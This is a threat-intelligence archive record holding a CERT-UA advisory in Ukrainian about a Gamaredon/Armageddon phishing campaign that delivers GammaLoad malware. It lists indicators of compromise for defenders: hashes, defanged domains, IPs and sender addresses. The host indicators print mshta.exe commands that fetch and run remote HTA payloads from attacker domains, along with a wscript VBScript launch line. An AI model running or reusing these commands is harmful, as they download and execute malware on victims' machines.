{
	"id": "ec778614-1ac4-4a4f-89be-202a37cd70dd",
	"created_at": "2026-04-06T00:11:55.771032Z",
	"updated_at": "2026-04-10T03:37:04.400695Z",
	"deleted_at": null,
	"sha1_hash": "13cc8bbc41db68d5e7a2078eaedd83005fb949af",
	"title": "CERT-UA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1563769,
	"plain_text": "CERT-UA\r\nArchived: 2026-04-05 16:57:39 UTC\r\nЗагальна інформація\r\nУрядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA отримано\r\nінформацію про факт розсилання електронних листів з темою \"Щодо проведення акції помсти у Херсоні!\",\r\nщо містять вкладення у вигляді файлу \"План Херсон.htm\".\r\nHTM-файл забезпечить декодування і створення на комп'ютері жертви файлу \"Herson.rar\", який містить\r\nфайл-ярлик \"План підходу та закладання вибухівки на об'єктах критичної інфростурктури Херсона.lnk\".\r\nЗгаданий LNK-файл у разі його вікдриття забезпечить завантаження і запуск HTA-файлу \"precarious.xml\",\r\nщо призведе до створення та виконання файлів \"desktop.txt\" і \"user.txt\".\r\nВ результаті, на комп'ютер буде завантажено шкідливу програму GammaLoad.PS1_v2 (імплементовано\r\nмеханізм виготовлення знімку екрану та його відправки на сервер управління).\r\nАктивність здійснюється групою UAC-0010 (Armageddon).\r\nІндикатори компрометації\r\nФайли:\r\n4c434fafbdb64ee9c56a4e3007b1ef33  b1bc659006938eb5912832eb8412c609d2d875c001ab411d1b69d343515291b7\r\nf94693b8def27e4555dc7ac6a25260d0  f9b68f9a3e41bafa612bcadd6e4c5ef75870549164e50f6b7ec55d1edad90674\r\na367898f46c7a8ce0ba6d6e9690cc4b7  94f4b54060f50523380082879ac262e67477acf5656aec3912078e1d756e9f1f\r\nc3ad33e72e37f2f9ee1f901a9dab3660  370da0474afb87623e070b83834472c307089533796940fb8ebbe9c8cf048c93\r\n8993c593f70cc133dc70198052517c57  95eb176f66026aef579d515a5d2563dc2310eff038c68807c433b3418699f902\r\nd9041a202ef19a778817aed83f547010  000696f213103798767ad0ea47acf60d9d475c45de4584a0e8625067c1b89ba7\r\nc3c41fda9f83f579f3912ca4e769b634  3a0796096af51af33a28361670e9af8a9791b04c83025c0a904a36b3d1962c2e\r\n(10.05.2022)\r\nfd49ac4b68e63ef4c44a08c05157b520  215d79d31ec6c4b008cf585dcf90007487b636229284b9ad924f52206c46a8a7\r\n9e472931556b6f6e3c1e50d719df83f9  f2f4dec274f0d7bd26c0d39e1cffc4b38b1e1919dfca6e20f754eddfa5931bbf\r\n76bdfe083b9038ab35757ba8cfac9a97  7a36935f624855f21c03b17b9b6e652f9b400aec79f6d1f221ef7380f2f9c02e\r\nМережеві:\r\nsendmail[.]website\r\na0671524.xsph[.]ru\r\na0667987.xsph[.]ru\r\nqiwardos[.]ru\r\nhttps://cert.gov.ua/article/40240\r\nPage 1 of 3\n\nnitikora[.]ru\r\nmilotraf[.]ru\r\nnikotod[.]ru\r\nmilitary-ukraine@sendmail.website\r\ncoyote@sendmail.website\r\n194[.]58.121.198 (Received)\r\n92[.]53.116.145 (Received)\r\n216[.]128.131.233\r\n66[.]42.95.123\r\nhXXp://qiwardos[.]ru/get.php\r\nhXXp://qiwardos[.]ru/index.php\r\nhXXp://a0671524.xsph[.]ru/mo/faicon.ico\r\nhXXp://a0671524.xsph[.]ru/bandage/precarious.xml\r\nhXXp://a0667987.xsph[.]ru/zsu/faicon.ico\r\nhXXp://a0667987.xsph[.]ru/preparations/rejection.xml\r\nhXXps://icanhazip[.]com (Легітимний сервіс)\r\nХостові:\r\n%WINDIR%\\System32\\mshta.exe http://a0671524.xsph.ru/bandage/precarious.xml /f\r\n%WINDIR%\\System32\\mshta.exe http://a0667987.xsph.ru/preparations/rejection.xml /f\r\ncmd.exe /c wscript.exe %USERPROFILE%\\desktop.txt //b //e:VBScript\r\n%USERPROFILE%\\desktop.txt\r\nГрафічні зображення\r\nhttps://cert.gov.ua/article/40240\r\nPage 2 of 3\n\nSource: https://cert.gov.ua/article/40240\r\nhttps://cert.gov.ua/article/40240\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://cert.gov.ua/article/40240"
	],
	"report_names": [
		"40240"
	],
	"threat_actors": [
		{
			"id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308",
			"created_at": "2022-10-25T15:50:23.320841Z",
			"updated_at": "2026-04-10T02:00:05.356444Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Gamaredon Group",
				"IRON TILDEN",
				"Primitive Bear",
				"ACTINIUM",
				"Armageddon",
				"Shuckworm",
				"DEV-0157",
				"Aqua Blizzard"
			],
			"source_name": "MITRE:Gamaredon Group",
			"tools": [
				"QuietSieve",
				"Pteranodon",
				"Remcos",
				"PowerPunch"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d5156b55-5d7d-4fb2-836f-861d2e868147",
			"created_at": "2023-01-06T13:46:38.557326Z",
			"updated_at": "2026-04-10T02:00:03.023048Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"ACTINIUM",
				"DEV-0157",
				"Blue Otso",
				"G0047",
				"IRON TILDEN",
				"PRIMITIVE BEAR",
				"Shuckworm",
				"UAC-0010",
				"BlueAlpha",
				"Trident Ursa",
				"Winterflounder",
				"Aqua Blizzard",
				"Actinium"
			],
			"source_name": "MISPGALAXY:Gamaredon Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "61940e18-8f90-4ecc-bc06-416c54bc60f9",
			"created_at": "2022-10-25T16:07:23.659529Z",
			"updated_at": "2026-04-10T02:00:04.703976Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Actinium",
				"Aqua Blizzard",
				"Armageddon",
				"Blue Otso",
				"BlueAlpha",
				"Callisto",
				"DEV-0157",
				"G0047",
				"Iron Tilden",
				"Operation STEADY#URSA",
				"Primitive Bear",
				"SectorC08",
				"Shuckworm",
				"Trident Ursa",
				"UAC-0010",
				"UNC530",
				"Winterflounder"
			],
			"source_name": "ETDA:Gamaredon Group",
			"tools": [
				"Aversome infector",
				"BoneSpy",
				"DessertDown",
				"DilongTrash",
				"DinoTrain",
				"EvilGnome",
				"FRAUDROP",
				"Gamaredon",
				"GammaDrop",
				"GammaLoad",
				"GammaSteel",
				"Gussdoor",
				"ObfuBerry",
				"ObfuMerry",
				"PlainGnome",
				"PowerPunch",
				"Pteranodon",
				"Pterodo",
				"QuietSieve",
				"Remcos",
				"RemcosRAT",
				"Remote Manipulator System",
				"Remvio",
				"Resetter",
				"RuRAT",
				"SUBTLE-PAWS",
				"Socmer",
				"UltraVNC"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236a8303-bf12-4787-b6d0-549b44271a19",
			"created_at": "2024-06-04T02:03:07.966137Z",
			"updated_at": "2026-04-10T02:00:03.706923Z",
			"deleted_at": null,
			"main_name": "IRON TILDEN",
			"aliases": [
				"ACTINIUM ",
				"Aqua Blizzard ",
				"Armageddon",
				"Blue Otso ",
				"BlueAlpha ",
				"Dancing Salome ",
				"Gamaredon",
				"Gamaredon Group",
				"Hive0051 ",
				"Primitive Bear ",
				"Shuckworm ",
				"Trident Ursa ",
				"UAC-0010 ",
				"UNC530 ",
				"WinterFlounder "
			],
			"source_name": "Secureworks:IRON TILDEN",
			"tools": [
				"Pterodo"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434315,
	"ts_updated_at": 1775792224,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/13cc8bbc41db68d5e7a2078eaedd83005fb949af.pdf",
		"text": "https://archive.orkl.eu/13cc8bbc41db68d5e7a2078eaedd83005fb949af.txt",
		"img": "https://archive.orkl.eu/13cc8bbc41db68d5e7a2078eaedd83005fb949af.jpg"
	}
}